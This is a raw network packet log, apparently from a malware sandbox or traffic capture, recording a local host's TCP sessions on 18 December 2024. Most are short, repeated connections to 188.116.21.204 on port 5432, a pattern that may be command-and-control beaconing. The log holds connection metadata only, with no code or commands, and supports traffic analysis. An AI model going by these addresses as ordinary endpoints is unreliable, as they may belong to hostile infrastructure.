                                                                                          Dec 18, 2024 12:42:09.936146975 CET4434988120.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:09.936183929 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:09.939627886 CET4434988120.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:09.939698935 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:10.076209068 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:10.076263905 CET44349886185.199.110.133192.168.2.6
                                                                                          Dec 18, 2024 12:42:10.076358080 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:10.076817036 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:10.076838017 CET44349886185.199.110.133192.168.2.6
                                                                                          Dec 18, 2024 12:42:11.291574955 CET44349886185.199.110.133192.168.2.6
                                                                                          Dec 18, 2024 12:42:11.291678905 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:11.293262005 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:11.293270111 CET44349886185.199.110.133192.168.2.6
                                                                                          Dec 18, 2024 12:42:11.293394089 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:11.293421984 CET44349886185.199.110.133192.168.2.6
                                                                                          Dec 18, 2024 12:42:11.295424938 CET49886443192.168.2.6185.199.110.133
                                                                                          Dec 18, 2024 12:42:16.308082104 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:16.428112984 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:16.428222895 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:16.428333044 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:16.547903061 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:17.762682915 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:17.763626099 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:17.883352995 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:18.196111917 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:18.197952986 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:18.317639112 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:18.934931993 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:18.934973955 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:18.935033083 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:18.935858011 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:18.935976982 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:19.055402040 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:19.055449963 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:19.375169039 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:19.375366926 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:19.494895935 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:19.809849024 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:19.816788912 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:19.937582016 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:20.253992081 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:20.306145906 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:23.681864977 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:23.801480055 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.113873005 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.114089012 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:24.233525991 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.558578014 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.558906078 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:24.678585052 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.991329908 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:24.991518021 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:25.111907959 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:25.423834085 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:25.424154997 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:25.543751955 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:25.856682062 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:25.857045889 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:25.976804972 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:26.318187952 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:26.318386078 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:26.437947989 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:26.750992060 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:26.751566887 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:26.873060942 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.188535929 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.208978891 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.328588963 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.640945911 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.647339106 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.647408009 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.647589922 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.760592937 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.767963886 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.767996073 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.768289089 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.768342018 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.880220890 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.880311966 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.884556055 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:28.004045963 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.254224062 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.256609917 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:29.376329899 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.694022894 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.695348978 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:29.814907074 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488845110 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488866091 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488929033 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.489842892 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.489940882 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.609667063 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.609775066 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.930354118 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.930560112 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:31.050107002 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:31.367232084 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:31.373871088 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:31.493724108 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:32.112473965 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:32.165560961 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.338248968 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.457901955 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:35.777215004 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:35.777419090 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.897000074 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.227410078 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.227711916 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:36.347256899 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.665122032 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.665333986 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:36.784903049 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.102188110 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.102451086 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:37.221900940 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.550333023 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.550529957 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:37.670964003 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.989000082 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.989212036 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:38.108979940 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.435173035 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.435368061 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:38.555358887 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.905139923 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.905540943 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.025799990 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.347877979 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.348057985 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.348081112 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.348210096 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.463949919 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.467808962 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.467842102 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.468187094 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.468241930 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.583580017 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:39.583672047 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.587555885 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.707076073 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.073641062 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.075195074 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:41.195044994 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.509718895 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:41.510320902 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:41.630062103 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.342282057 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.342340946 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.343163967 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.343472004 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.343571901 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:42.463004112 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.463105917 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.938572884 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:42.938798904 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:43.058382988 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:43.715152979 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:43.721895933 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:43.842820883 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:44.157272100 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:44.212469101 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.400814056 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.520508051 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:47.842900038 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:47.843179941 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:47.963773966 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.287323952 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.288255930 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:48.407850027 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.721496105 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:48.722384930 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:48.842741013 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.157434940 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.157875061 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:49.279716969 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.598628044 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:49.598855019 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:49.718475103 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:50.653745890 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:50.654016972 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:50.773665905 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.087081909 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.090922117 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:51.210603952 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.933934927 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:51.934129000 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.054053068 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.370892048 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.371345043 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.371345043 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.371403933 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.491110086 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491154909 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491472960 CET543249960188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.491525888 CET499605432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.495276928 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.615042925 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:52.615171909 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.615257978 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:52.735086918 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:53.950826883 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:53.953365088 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:54.076425076 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:54.717971087 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:54.718395948 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:54.839328051 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.162337065 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.162620068 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.163043976 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.163340092 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.163425922 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.282838106 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.282893896 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.597613096 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:55.597835064 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:55.718334913 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:56.338890076 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:56.345834970 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:56.467343092 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:57.090965033 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:57.134340048 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:00.587950945 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:00.707530022 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.101466894 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.101741076 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:01.221292019 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.544727087 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.544970989 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:01.664536953 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.976273060 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:01.976666927 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.096165895 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.407957077 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.408699989 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.530149937 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.852850914 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:02.853260040 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:02.975722075 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.291920900 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.292207003 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:03.411739111 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.723712921 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:03.724625111 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:03.848752975 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.160478115 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.160859108 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.280760050 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.596484900 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.597002983 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.597002983 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.597193956 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.713958025 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.716680050 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.716708899 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.717279911 CET543249991188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.717365026 CET499915432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.833687067 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:04.833863020 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.833982944 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:04.953495026 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:06.170770884 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:06.173499107 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:06.293075085 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:06.615339994 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:06.616164923 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:06.735837936 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.057146072 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.057166100 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.057233095 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:07.058022022 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:07.058104038 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:07.177664042 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.177678108 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.495874882 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.496105909 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:07.615607023 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.936724901 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:07.943465948 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:08.063173056 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:08.383373976 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:08.431231976 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:11.588212013 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:11.707832098 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:12.330030918 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:12.330352068 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:12.449857950 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:12.780035973 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:12.780249119 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:12.900298119 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:13.219211102 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:13.219417095 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:13.339428902 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:13.614006042 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:13.614228010 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:13.733784914 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.018635035 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.018870115 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:14.138768911 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.413700104 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.413917065 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:14.533534050 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.890944958 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:14.891156912 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.010716915 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.301410913 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.301651001 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.421432018 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.695507050 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.695776939 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.695776939 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.695899963 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.809390068 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.816459894 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.816484928 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.816874027 CET543250020188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.816920042 CET500205432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.930654049 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:15.930761099 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:15.930874109 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:16.050478935 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.178064108 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.179445982 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:17.299711943 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.572976112 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.573370934 CET500385432192.168.2.6188.116.21.204
